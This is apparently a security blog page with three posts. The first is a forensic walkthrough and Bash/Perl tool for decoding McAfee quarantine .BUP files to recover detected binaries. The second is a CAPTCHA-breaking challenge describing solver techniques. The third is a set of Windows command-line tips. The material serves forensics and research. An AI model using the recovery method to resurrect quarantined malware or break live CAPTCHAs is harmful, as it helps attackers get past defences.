Now, after re-enabling the On-Access scan, we have a detection:



Now we check the quarantine folder defined in Quarantine Manager Policy shown above and eureka! We have a .BUP file:



If this file did not trigger a detection, you may not have GTI enabled. Try enabling GTI first, or use another known-safe, yet detected, binary to generate the BUP file.

Extracting the BUP in Windows

To extract the BUP in Windows, I followed the helpful How to restore a quarantined file not listed in the VSE Quarantine Manager McAfee KnowledgeBase article.

Requirements:
  • 7-zip (Used to decompress the Microsoft compound document format)
  • Bitwise XOR binary such as: xor.exe

If you are extracting the BUP on the same computer that your McAfee antivirus is running on, make sure you disable On-Access scan or exclude the target folder from scans.

Use 7-zip to extract the file by right clicking it, selecting 7-Zip, then Extract Here.



The results should be two files:
  • Details
  • File_0

 $ md5sum.exe Details
c0bb879bdfd5b5277fc661da602f7460 *Details

$ md5sum.exe File_0
02ab0a6723bca2e8b6b70571680210a9 *File_0



Now, use the xor.exe binary to perform a bitwise XOR against the key (0x6A) in order to obtain two new files. Feel free to use the following syntax in a command prompt:

 C:\QUARANTINE>xor.exe Details Details.txt 0X6A

C:\QUARANTINE>xor.exe File_0 Captured.exe 0X6A





If you would like to restore the original file name to the binary, just look at the metadata from Details.txt. The most useful items that we see in the metadata are the following:
  • A/V detection name - Useful for discovering more information about the detection
  • Major and minor versions of A/V engine - Can be used to troubleshoot why some hosts detect and others miss
  • Major and minor versions of A/V DATs - Can be used to troubleshoot why some hosts detect and others miss
  • When the file was captured (Creation fields) - Helps you create a timeline if detected by On-Access scan
  • Time zone of host - Useful for timeline
  • Original file name - Often reveals a good amount of information about the binary

Snippet of Details.txt:

 [Details]
DetectionName=Artemis!5DB32A316F07
DetectionType=0
EngineMajor=5400
EngineMinor=1158
DATMajor=6771
DATMinor=0
DATType=2
ProductID=12106
CreationYear=2012
CreationMonth=7
CreationDay=14
CreationHour=13
CreationMinute=25
CreationSecond=18
TimeZoneName=Eastern Daylight Time
TimeZoneOffset=240
NumberOfFiles=1
NumberOfValues=5

--snip--

[File_0]
ObjectType=5
OriginalName=C:\USERS\REDACTED\DESKTOP\ARTEMISTEST.EXE
WasAdded=0




Now that you have the original file, you can restore it, reverse it, or whatever your heart desires.

But first, let’s make sure the hash of the recovered file matches the hash taken before deactivation. For completeness, we will also provide the hash for Details.txt.

 $ md5sum.exe Captured.exe
5db32a316f079fe7947100f899d8db86 *Captured.exe <- This matches

$ md5sum.exe Details.txt
46c09e5ba29658a69527ca32c6895c08 *Details.txt




Extracting the BUP in Linux

We just detailed the process to recover the binary from a BUP in Windows. You can perform this same process in Linux if you have 7zip and Wine (used to run the xor.exe binary). However, the goal of this tool was to automate the process, add some features, and remove the Wine dependency.

The UnBup Tool

The first thing you should know about UnBup is the usage menu:
 Usage:  UnBup.sh [option] <bup file>

-d = details file only (no executable)
-h = help menu
-s = safe executable (extension is .ex)

Please report bugs to Tony.Lee@Foundstone.com and Travis_Rosiek@McAfee.com


  1. No options - Yields the Details.txt file and the original binary
  2. -d option - Yields the Details.txt file only (no binary)
  3. -s option - Yields the Details.txt file and the binary, with an extension of .ex to prevent accidental execution

Demo: No Options

 UnBup.sh file.bup


Supplying UnBup with no options and just the BUP file produces the details.txt file and the binary. Note that the MD5 hashes are the same as what was seen in the Windows section.



Demo: The -d Option

 UnBup.sh -d file.bup


The -d option is useful for those who may not want to reverse or dig into the binary—but would like a little more information around the detection.



Demo: The -s Option

 UnBup.sh -s file.bup


The -s option is not a foolproof measure to prevent execution of the binary; however, it can help prevent accidental execution. In this case, since we are extracting Windows malware in a Linux environment, this adds another level of protection, as it is harder (if not impossible) to cross-infect a different operating system.



How it works (simplistically)

If you look at the supplied bash code below and think: “This must be a backdoor, there is no way I am going to run it on my box…”, then the screenshot below is directed at you.

The binary math in bash was the most annoying part of the process, but it was also the most important. Here is the breakdown of each step:
  1. xxd to convert the binary to hex
  2. Performing the XOR
  3. Converting the decimal result to hex
  4. The final hex-to-ASCII conversion is only there to show you readable output (it is not performed in the script)



The Shell Script – (SLOW – You may want to use the Perl code below)

Download it here: https://raw.github.com/OpenSecurityResearch/unbup/master/UnBup.sh

In case the file download is blocked, feel free to copy and paste it from here:

#!/bin/bash
# UnBup
# Tony Lee and Travis Rosiek
# Tony.Lee-at-Foundstone.com
# Travis_Rosiek-at-McAfee.com
# Bup Extraction tool - Reverse a McAfee Quarantined Bup file with Bash
# Input: Bup File
# Output: Details.txt file and original binary (optional)
# Note: This does not put the file back to the original location (output is to current directory)
# Requirements - 7z (7zip), xxd (hexdumper), bc, awk, cut, grep

##### Function Usage #####
# Prints usage statement
##########################
Usage()
{
echo "UnBup v1.0
Usage: UnBup.sh [option] <bup file>

-d = details file only (no executable)
-h = help menu
-s = safe executable (extension is .ex)

Please report bugs to Tony.Lee-at-Foundstone.com and Travis_Rosiek-at-McAfee.com"
}

# Detect the absence of command line parameters. If the user did not specify any, print usage statement
[[ -n "$1" ]] || { Usage; exit 0; }


##### Function XorLoop #####
# Loop through files to perform a bitwise xor with the key and write the binary to a file
############################
XorLoop()
{
for byte in `xxd -c 1 -p $INPUT`; do # For loop converts binary to hex 1 byte per line
#echo "$byte"
decimal=`echo $((0x$byte ^ 0x6A))` # xor with 6A and convert to decimal
#echo "decimal = $decimal"
hex=`echo "obase=16; $decimal" | bc` # Convert decimal to hex
#echo "hex = $hex"
echo -ne "\x$hex" >> $OUTPUT; # Write raw hex to output file
done
}


##### Function CreateDetails #####
# Create the Details.txt file with metadata on bup'd file
##################################
CreateDetails()
{
# Check to see if the text file exists, if not let the user know
[[ -e "$BupName" ]] || { echo -e "\nError: The file $BupName does not exist\n"; Usage; exit 0; }
echo "Extracting encoded files from Bup";
7z e $BupName > /dev/null; # Extract the xor encoded files (Details and File_0)
INPUT=Details; # Set INPUT variable to the Details file to get the details and filename
OUTPUT=Details.txt; # Set OUTPUT variable to Details.txt filename
echo "Creating the Details.txt file";
XorLoop; # Call XorLoop function with variables set
}


##### Function ExtractBinary #####
# Extracts the original binary from the bup file
##################################
ExtractBinary()
{
Field=`grep OriginalName Details.txt | awk -F '\' '{ print NF }'`; # Find the binary name field
OUTNAME=`grep OriginalName Details.txt | cut -d '\' -f $Field`;
OUTPUT=`echo "${OUTNAME%?}"`; # Get rid of trailing \r
INPUT=File_0;
echo "Extracting the binary";
XorLoop; # Call xor function again
}

# Parse the command line options
case $1 in
-d) BupName=$2; CreateDetails;; # Details.txt file only
-h) Usage; exit 0;; # Help menu
-s) BupName=$2; CreateDetails; ExtractBinary; mv $OUTPUT `echo "${OUTPUT%?}"`;; # Safe binary
*) BupName=$1; CreateDetails; ExtractBinary;; # Full process of the bup
esac

rm Details File_0; # Clean up xor'd files





Our Perl script (MUCH FASTER – You probably want to use this over the shell script)

When processing small files like the Artemis test file, bash shell scripting worked just fine. However, when processing larger executables, the XOR process was too time consuming. We searched for a simple XOR Perl script on-line, but did not find anything to fit what we were looking for so we wrote our own.

xor.pl Usage:
 ./xor.pl
Simple xor script
Usage: ./xor.pl [Input File] [Output File]

Tony.Lee@Foundstone.com
./xor.pl 7dc7ed19123df0.bup 7dc7ed19123df0.xord



Download : https://raw.github.com/OpenSecurityResearch/unbup/master/xor.pl

  #!/usr/bin/perl
# Simple xor decoder
# Written because I could not find one on the Intertubes
# Email me with problems at Tony.Lee-at-Foundstone.com

# Detection to make sure there are two arguments supplied (an input file and output file)
if (@ARGV < 2) {
die "Simple xor script\n Usage: $0 <Input File> <Output File>\n\nTony.Lee-at-Foundstone.com\n";
}

# Open input file as read only to avoid accidentally modifying the file
open INPUT, "<$ARGV[0]" or die "Input file \"$ARGV[0]\" does not exist\n";

# Open the output file to write to it
open OUTPUT, ">$ARGV[1]" or die "Cannot open file \"$ARGV[1]\"";

# Loop until all bytes in the file are read
while (($n = read INPUT, $byte, 1) != 0)
{
$decode = $byte ^ 'j'; # xor byte against ASCII 'j' = Hex 0x6A = Dec 106
print OUTPUT $decode; # write the decoded output to a file
}

close INPUT;
close OUTPUT;



After writing the XOR Perl script, we converted the Bash script to Perl to speed the process up.

UnBup.pl

Download : https://raw.github.com/OpenSecurityResearch/unbup/master/UnBup.pl

  #!/usr/bin/perl
# UnBup
# Tony Lee and Travis Rosiek
# Tony.Lee-at-Foundstone.com
# Travis_Rosiek-at-McAfee.com
# Bup Extraction tool - Reverse a McAfee Quarantined Bup file with Perl
# Input: Bup File
# Output: Details.txt file and original binary (optional)
# Note: This does not put the file back to the original location (output is to current directory)


# Detect the absence of command line parameters. If the user did not specify any, print usage statement
if (@ARGV == 0) { Usage(); exit(); }


##### Function Usage #####
# Prints usage statement
##########################
sub Usage
{
print "UnBup v1.0
Usage: UnBup.pl [option] <bup file>

-d = details file only (no executable)
-h = help menu
-s = safe executable (extension is .ex)

Please report bugs to Tony.Lee-at-Foundstone.com and Travis_Rosiek-at-McAfee.com\n"
}


##### Function XorLoop #####
# Loop through files to perform bitwise xor with key write binary to file
# Input arguments input filename and output filename
# example: XorLoop(Details, Details.txt)
############################
sub XorLoop
{
# Open input file as read only to avoid accidentally modifying the file
open INPUT, "<$_[0]" or die "Input file \"$_[0]\" does not exist\n";

# Open the output file to write to it
open OUTPUT, ">$_[1]" or die "Cannot open file \"$_[1]\"";

# Loop until all bytes in the file are read
while (($n = read INPUT, $byte, 1) != 0)
{
$decode = $byte ^ 'j'; # xor byte against ASCII 'j' = Hex 0x6A = Dec 106
print OUTPUT $decode; # write the decoded output to a file
}

close INPUT;
close OUTPUT;
}

##### Function CreateDetails #####
# Create the Details.txt file with metadata on bup'd file
##################################
sub CreateDetails
{
$BupName=$_[0];
# Check to see if the text file exists, if not let the user know
unless(-e "$BupName") { print "\nError: The file \"$BupName\" does not exist\n"; Usage; exit 0; }
print "Extracting encoded files from Bup\n";
`7z e $BupName`; # Extract the xor encoded files (Details and File_0)
print "Creating the Details.txt file\n";
XorLoop("Details", "Details.txt"); # Call XorLoop function with variables set
}

##### Function ExtractBinary #####
# Extracts the original binary from the bup file
##################################
sub ExtractBinary
{
$Field=`grep OriginalName Details.txt | awk -F '\\' '{ print NF }'`; # Find the binary name field
$OUTNAME=`grep OriginalName Details.txt | cut -d '\\' -f $Field`; # Find the binary name
$OUTNAME =~ s/[\r\n]+$//; # Strip the trailing CR/LF carried over from Details.txt
$INPUT="File_0";
print "Extracting the binary\n";
XorLoop("$INPUT", "$OUTNAME"); # Call xor function again
}



if ($ARGV[0] eq "-d"){ # Print details file only
CreateDetails($ARGV[1]);
`rm Details File_0`; # Clean up original files
}
elsif ($ARGV[0] eq "-h"){ # Print usage statement
Usage();
}
elsif ($ARGV[0] eq "-s"){ # Create "safe" binary
CreateDetails($ARGV[1]);
ExtractBinary();
$OLD=$OUTNAME; # Store original name in $OLD variable
chop($OUTNAME); # Drop the final E so the extension becomes .EX
`mv "$OLD" "$OUTNAME"`; # Rename the binary to prevent accidental execution
`rm Details File_0`; # Clean up original files
}
else {
CreateDetails($ARGV[0]); # Extract details file and binary
ExtractBinary();
`rm Details File_0`; # Clean up original files
}




Final thoughts and coding challenge

We provided two different methods for extracting McAfee BUP files in Linux. It may not be the most graceful solution—but it works and it did not take much time to hack up. However, we are open to adding options that would be useful to others; if you have ideas, please feel free to tell us what you would find useful.

Additionally, these scripts (bash and Perl) fit the bill for us—but they may not meet the needs of those without the 7zip extractor (bash and Perl) or the xxd utility (bash script only). Our challenge to anyone who wants to geek out is the following:
  1. Reduce the dependencies (No need for 7zip or xxd)
  2. Code it in your favorite language (python, ruby, C, LUA… whatever you want)
  3. Be as concise and clear as possible

One hint to anyone who gets started on manually parsing the format:

 hexdump -C 7dc7ed19123df0.bup | head -n 1

00000000 d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 |................|
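If you take up the challenge, a small starting point is simply recognizing the container: the first eight bytes in the hexdump above are the standard OLE2 compound document signature. A minimal Java check, where the class name and command-line handling are just for illustration:

import java.io.FileInputStream;
import java.io.IOException;
import java.util.Arrays;

public class BupMagicCheck {
    // The OLE2 / compound document signature, as seen in the hexdump above.
    private static final byte[] OLE2_MAGIC = {
        (byte) 0xD0, (byte) 0xCF, 0x11, (byte) 0xE0,
        (byte) 0xA1, (byte) 0xB1, 0x1A, (byte) 0xE1
    };

    public static void main(String[] args) throws IOException {
        byte[] header = new byte[8];
        try (FileInputStream in = new FileInputStream(args[0])) {
            boolean isBup = in.read(header) == 8 && Arrays.equals(header, OLE2_MAGIC);
            System.out.println(isBup ? "Looks like a compound document (BUP candidate)"
                                     : "Not a compound document");
        }
    }
}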





Feel free to post back. :) Happy hacking!

Can You Break My CAPTCHA?

By Gursev Kalra.

I wrote a simple CAPTCHA scheme and wanted to share it with the awesome security community as a CAPTCHA-breaking exercise. To solve the CAPTCHA, an individual (or machine) has to enter only the characters with a white border and ignore the other text. I understand that at this stage the lettering may sometimes be hard to read; we're working on that, but for now, let's see how far we can get with this POC design. Here are a couple:




Anti-Automation Mechanisms

The main intent was to make noise removal, segmentation, and classification interdependent and to increase the complexity of automatic solvers. Here are the anti-automation mechanisms in this CAPTCHA:

  1. Closeness of noise to real text: The noise is of the same style as the real text (i.e. alphanumeric) and is superimposed on it, and the noise font is the same size as the text to be solved. This increases the difficulty of removing the noise, and regular noise-removal algorithms may be ineffective. The random background line serves to highlight the white border and also acts as a noise source.
  2. Hard to Segment: The CAPTCHA solution and noise are mixed up in an unpredictable fashion, with random positional variation on the X and Y axes. It may therefore be hard to separate characters from each other and single out individual characters for classification.
  3. Anti-Classification: When writing custom solvers, statistical analysis is performed on the CAPTCHA text by plotting pixel densities against the X and Y axes to identify the correct characters. When text is superimposed with no clear demarcation of character boundaries, these classification techniques do not work (a rough sketch of this kind of analysis follows below).
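To make item 3 concrete, here is a rough sketch of the simplest form of that analysis: counting dark pixels per column to look for gaps between characters. It uses only the standard javax.imageio and java.awt.image classes, the darkness threshold is an arbitrary assumption, and superimposed noise text is exactly what smears these column densities together:

import java.awt.image.BufferedImage;
import java.io.File;
import javax.imageio.ImageIO;

public class ColumnDensity {
    public static void main(String[] args) throws Exception {
        BufferedImage img = ImageIO.read(new File(args[0])); // path to a downloaded CAPTCHA sample
        for (int x = 0; x < img.getWidth(); x++) {
            int dark = 0;
            for (int y = 0; y < img.getHeight(); y++) {
                int rgb = img.getRGB(x, y);
                int luma = ((rgb >> 16 & 0xFF) + (rgb >> 8 & 0xFF) + (rgb & 0xFF)) / 3;
                if (luma < 128) dark++; // arbitrary darkness threshold
            }
            System.out.printf("column %3d: %d%n", x, dark);
        }
    }
}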


Samples

You can find 200 samples for download here:


Where to start?

Since this is a new scheme, you may not be able to use any of the popular CAPTCHA-breaking tools out there to defeat it. Instead, one approach is to use graphics editing software like Adobe Photoshop to modify a sample. Once you have a set of actions (e.g. apply effect X, then apply filter Y) that you can repeat on multiple samples to reliably solve them, you have a potential solution! Then just post your solution or questions in the comments below and we can discuss!


Simple but Extremely Useful Windows Tricks

By Tony Lee and Matt Kemelhar.

Navigating Windows in the most efficient manner possible can be seen as wizardry; it almost seems as if Microsoft tries to make it increasingly difficult to accomplish simple things. However, there are plenty of very useful tricks and shortcuts built into Windows; the problem is that they are not publicized very well. Students in our Ultimate Hacking Courses usually find these Windows tips useful, so we figured we would share them.

Command shell history

If you thought “doskey /history” was cool—this is even better and more useful. Function keys help control and recall the command history in Windows. We have noted the most useful keys and their function below. Try them out for yourself.

F7 – Graphical command shell history. After hitting F7, you can use the arrow keys to scroll up and down through the command history, then use the right arrow key to edit the command or hit Enter to run it. The screenshot below shows the graphical command history presented after the user presses F7; it can be navigated via the arrow keys.



F1 – Letter by letter repeat of the last command

F2 – Retype letters up to a certain letter

F3 – Retype last command

F4 – Delete characters from the cursor up to a certain character

F5 – Scroll up through command history (same as up arrow)

F9 – Enter the number of the command you would like to repeat

Command shell shortcuts

Adjusting the command shell to fit your preferences can sometimes be a headache (too much clicking for a shell). Here are some ways to customize the view without touching the mouse.

mode – adjusting the size of the command shell

This is often very useful when running commands whose output extends beyond the 80-character default width of the unaltered command shell.

Syntax: mode [width],[height]

Ex: mode 120,120

This screenshot shows you what it looks like to expand the window quickly with mode.



color - Sets the default console foreground and background colors

This is very useful when setting different color shells to indicate different functionality.

COLOR [attr]
attr Specifies color attribute of console output

Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the following values:

0 = Black 8 = Gray
1 = Blue 9 = Light Blue
2 = Green A = Light Green
3 = Aqua B = Light Aqua
4 = Red C = Light Red
5 = Purple D = Light Purple
6 = Yellow E = Light Yellow
7 = White F = Bright White

If no argument is given, this command restores the color to what it was when CMD.EXE started.




The screenshot below shows two different windows with two different colors with netcat listeners on different ports.



Title - Sets the window title for the command prompt window

This is also useful for labeling your windows with a title that is easy to remember and descriptive of what you are working on.

TITLE [string]
    string       Specifies the title for the command prompt window.



Let's see what this looks like. The screenshot below shows how to change the title of the window via the command line.



findstr – (grep for Windows)

findstr searches for strings in files [or anything else]. If you wanted grep in Windows, you've got it. findstr has been present in Windows since XP and 2003. It accepts regular expressions and can search case-insensitively (/I). One of our favorite ways to use this command is for filtering—especially long lists such as process listings and listening ports.

Process lists:
C:\>tasklist | findstr /i EXPLORER
explorer.exe 3404 Console 1 119,884 K



Port lists:
C:\>netstat -an | findstr 135
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP [::]:135 [::]:0 LISTENING

C:\>netstat -an | findstr 445
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
UDP 127.0.0.1:63445 *:*



write - the greatest shortcut ever

Prefer WordPad over Notepad at times?

Want to launch it from the command line, but hate typing the full path (C:\Program Files\Windows NT\Accessories\wordpad.exe or C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe)?
How about five letters? w r i t e



tree – graphical “text” directory listings

Ever wanted to dump the contents of a particular directory or structure to a text file? tree is the way to go—it is fast and recursive. The “/F” attribute will list the files in addition to the folders—leave it off and you just get the folders. "/A" is useful if you are sending output to a text file or other document.

TREE [drive:][path] [/F] [/A]

/F Display the names of the files in each folder.
/A Use ASCII instead of extended characters.


C:\> tree /a /f c:\users

Folder PATH listing for volume PSV
Volume serial number is 8800-000
C:\USERS
+---Tony
| | test.exe
| | Sti_Trace.log
| |
| +---Contacts
| | Tony.contact
| |
| +---Desktop
| | | cmd.txt
| | | fixPrinter.bat
| | | malicious.exe
| | | research.txt
--snip--





type - when you can’t spare the GUI

If you live in the command line and don’t want to spawn a graphical text editor to read a simple file, you can always “type” the file. This is similar to “cat” in *nix. If you need to read larger documents, the output can be piped to more, or just use more to read the file in the first place.

TYPE [drive:][path]filename

C:\>type %TEMP%\readme.txt
"This is how you can read a text file from the command line"





Those are some of our favorite tricks for making Windows more convenient to use! Hopefully there was at least one trick here that is new to you.

Do you have any tricks that amaze others? Share them in the comments below!
